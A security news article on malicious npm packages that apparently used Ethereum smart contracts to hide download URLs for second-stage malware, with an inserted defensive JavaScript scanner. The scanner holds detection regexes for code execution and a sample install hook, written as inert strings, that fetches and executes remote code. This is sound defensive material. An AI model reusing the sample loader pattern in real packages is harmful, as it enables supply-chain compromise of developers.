Attackers Are Now Using Ethereum Smart Contracts to Hide Malware

Ethereum has become the latest front in software supply chain attacks.

ReversingLabs researchers earlier this week discovered two malicious npm packages that used Ethereum smart contracts to hide their harmful code, allowing the malware to bypass traditional security controls.

npm is the package manager for the Node.js runtime environment and is considered the largest software registry in the world, where developers access and share code that goes into millions of software projects.

The packages, “colortoolsv2” and “mimelib2”, were uploaded in July to the widely used Node package manager repository. At first glance they appeared to be simple utilities, but in practice they used the Ethereum blockchain to retrieve hidden URLs that directed compromised systems to download second-stage malware.

By embedding these commands in a smart contract, the attackers disguised their activity as legitimate blockchain traffic, making detection difficult.
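A heuristic triage check for the pattern described above, written here as an added example (not code from the article or from ReversingLabs): it flags an npm package whose install-time lifecycle hook sits beside blockchain RPC access, a remote fetch and dynamic execution in the same package. The indicator regexes and the sample package are constructed for illustration.

```javascript
// Added example: heuristic triage of an npm package for the install-hook +
// chain-lookup + download/execute combination. Indicator names are our own.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Each indicator is a label plus a regex run over the package's JS sources.
const INDICATORS = {
  chain_rpc: /require\(["'](ethers|web3)["']\)|eth_call|JsonRpcProvider/,
  remote_fetch: /\b(fetch|axios\.get|https?\.get)\s*\(|new URL\(/,
  dynamic_exec: /child_process|\bexec(Sync)?\s*\(|\beval\s*\(|new Function\(/,
};

// pkg: parsed package.json; sources: { filename: source text }.
// Returns which hooks are declared, which indicator classes fired, and a risk tier.
function scanPackage(pkg, sources) {
  const hooks = LIFECYCLE_HOOKS.filter((h) => pkg.scripts && pkg.scripts[h]);
  const hits = new Set();
  for (const src of Object.values(sources)) {
    for (const [label, re] of Object.entries(INDICATORS)) {
      if (re.test(src)) hits.add(label);
    }
  }
  const indicators = [...hits].sort();
  // "high" only when every stage of the described chain is present together
  // with an install hook: unattended execution at install time, a location
  // resolved via the blockchain, then a remote payload pulled and executed.
  const high =
    hooks.length > 0 &&
    hits.has("chain_rpc") &&
    hits.has("remote_fetch") &&
    hits.has("dynamic_exec");
  return { hooks, indicators, risk: high ? "high" : indicators.length ? "review" : "low" };
}

// Constructed sample: a package posing as a colour helper. The sources are
// inert strings; the contract address and method name are placeholders.
const SAMPLE_PKG = { name: "example-color-utils", version: "1.0.0", scripts: { postinstall: "node setup.js" } };
const SAMPLE_SOURCES = {
  "index.js": "module.exports = { hexToRgb: (h) => h };",
  "setup.js": [
    "const { ethers } = require('ethers');",
    "const { execSync } = require('child_process');",
    "const provider = new ethers.JsonRpcProvider(process.env.RPC_URL);",
    "const c = new ethers.Contract('0xPLACEHOLDER', ['function getString() view returns (string)'], provider);",
    "c.getString().then((u) => fetch(u).then((r) => r.text()).then((s) => execSync(s)));",
  ].join("\n"),
};

console.log(scanPackage(SAMPLE_PKG, SAMPLE_SOURCES));
```

The tier is a triage signal for review, not a verdict: many legitimate tools use an install hook or an RPC library alone, so only the full combination is rated high.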

“This is something we have not seen before,” ReversingLabs researcher Lucija Valentić said in her report. “The rapid evolution of evasion strategies by malicious actors that are trolling open source repositories and developers.”

The technique builds on an old playbook. Past attacks have used trusted services such as GitHub Gists, Google Drive or OneDrive to host malicious links. By leveraging Ethereum smart contracts instead, the attackers added a crypto-flavored twist to an already dangerous supply chain tactic.

The incident is part of a broader campaign. ReversingLabs found the packages linked to fake GitHub repositories that were passed off as cryptocurrency trading bots. These repositories were padded with fabricated commits, fake user accounts and inflated star counts to appear legitimate.

Developers who pulled the code risked importing malware without realizing it.

Supply chain risks in open source crypto tools are not new. Last year, researchers flagged more than 20 malicious campaigns targeting developers through repositories such as npm and PyPI.

Many aimed to steal wallet credentials or install cryptocurrency miners. But the use of Ethereum smart contracts as a delivery mechanism shows that adversaries are adapting quickly to blend in with blockchain ecosystems.

A key takeaway for developers is that popular commit histories or active maintainers can be faked, and even seemingly harmless packages can carry hidden payloads.
